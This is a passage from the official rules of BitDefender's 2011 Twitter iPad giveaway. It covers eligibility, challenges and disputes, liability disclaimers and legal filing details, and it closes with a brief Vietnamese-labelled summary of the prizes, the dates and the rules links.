 These Official Rules comply with the provisions of Government Order no. 99/2000 concerning the sale of market products and services, and with Government Decision no. 333/2003 – Methodological Norms for the Enforcement of Government Order no. 99/2000 concerning the sale of market products and services and with Law 677/2001 – concerning individual’s protection as far as personal data processing and free circulation are concerned. 
14 . PARTICIPANTS 
If the winner of a prize is under 18 years of age, he/she will not be entitled to receiving the prize as he/she was not eligible for this promotion in the first place. The lucky draw shall be resumed and the Sponsor and Organizer will be exempt from any liability arising from the awarding of the respective prize, as well as from the payment of any damages or claims of any nature in connection therewith. 
15. LITIGTIONS 
 In the event of a dispute on an entry’s validity, the commission’s decision shall be final. 
 By participating in this promotion and by filling in the form provided as part of campaign “ BitDefender’s Twitter iPad competition” participants agree to observing and complying with all provisions, terms and conditions hereof. 
Any challenges will be filed in writing, within 7 working days as of the lucky draw date, at the registered seat of SC BITDEFENDER SRL, 24 Preciziei Blvd., West Gate, Bldg. H2, groundfloor, Bucharest sector 6. 
In the event that the commission decide to admit the challenge, the lucky draw procedure will be resumed at a date to be publicly announced as soon as possible after the challenge admission. 
Any litigation that may arise between the Sponsor and Organizer and the participants shall be solved amicably and, where an amicable settlement is not possible, litigations will be referred for settlement to the Romanian courts of law of competent jurisdiction. 
The Sponsor and Organizer reserves the right to modify the dates and duration of the promotion, changes which will be publicly announced. 
16. OTHER REGULATIONS 
 This promotion is in no way sponsored, endorsed or administered by, or associated with Twitter. You understand that you are providing your information to bitdefender™ and not to Twitter. 
 By entering promotion “BitDefender’s Twitter iPad competition”, participants are aware of and unconditionally agree to these rules as well as with the decisions of BITDEFENDER SRL (Sponsor and organizer of the sweepstakes) with registered seat at 24 Preciziei Blvd., West Gate Park, Bldg. H2, Bucharest, sector 6, whose decisions will be final and legally binding from all points of view . 
All complaints regarding the awarded prizes and submitted after the signing date of the acknowledgment of prize receipt will be disregarded and they will not incur any liability on the Sponsor and Organizer’s part. 
In the event of attempted or successful defrauding of the system or of any actions likely to injure the Sponsor and Organizer’s image, such Sponsor and Organizer reserves the right to take all necessary steps in order to remedy the resulting situation. 
The Sponsor and Organizer undertakes no liability for any fact which results in the impossibility of validating a winner and in the resuming of the draw until another winner is validated, such as the impossibility of notifying the winner in writing due to such winner’s change of e-mail address or said winner’s failure to receive or read his/her correspondence, etc. etc. The Sponsor and Organizer will take all steps necessary for the contest to take place under normal circumstance, as per the above, but said Sponsor and Organizer does not undertake any liability for the possible complaints filed by participants and which do not refer to a breach in the legal framework in force. 
These Official Rules are available to anyone, for free, at the Sponsor and Organizer’s registered seat at 24 Preciziei Blvd., West Gate, Bldg. H2, Bucharest, sector 6 and on web site www.bitdefender.com/twittercontest. 
Drawn up at the registered seat of BitDefender SRL in 4 copies, one of which to be filed by the Sponsor and Organizer with the General Department of Public Income and Monopoly Management within the Ministry of Public Finance, by the promotion beginning date. 
Sponsor and Organizer of promotion “BitDefender’s Twitter iPad competition” 
BITDEFENDER SRL 
By General Manager 
Florin Talpes 

Quan trọng nhất:
We’ll be giving away 20 copies of BitDefender Internet Security 1 year 1 PC every week. When we reach the magic total of 9,000 followers we’ll be drawing the main prize – a cutting edge iPad 2 ( 32gb WiFi).
Thời gian:
Promotion “BitDefender’s Twitter iPad competition” begins 4 May 2011 and it ends on the 30 May 2011

Bạn có thể xem hướng dẫn chi tiết:
http://www.bitdefender.com/media/html/en/twittercontest/
http://www.bitdefender.com/media/html/en/twittercontest/regulament.html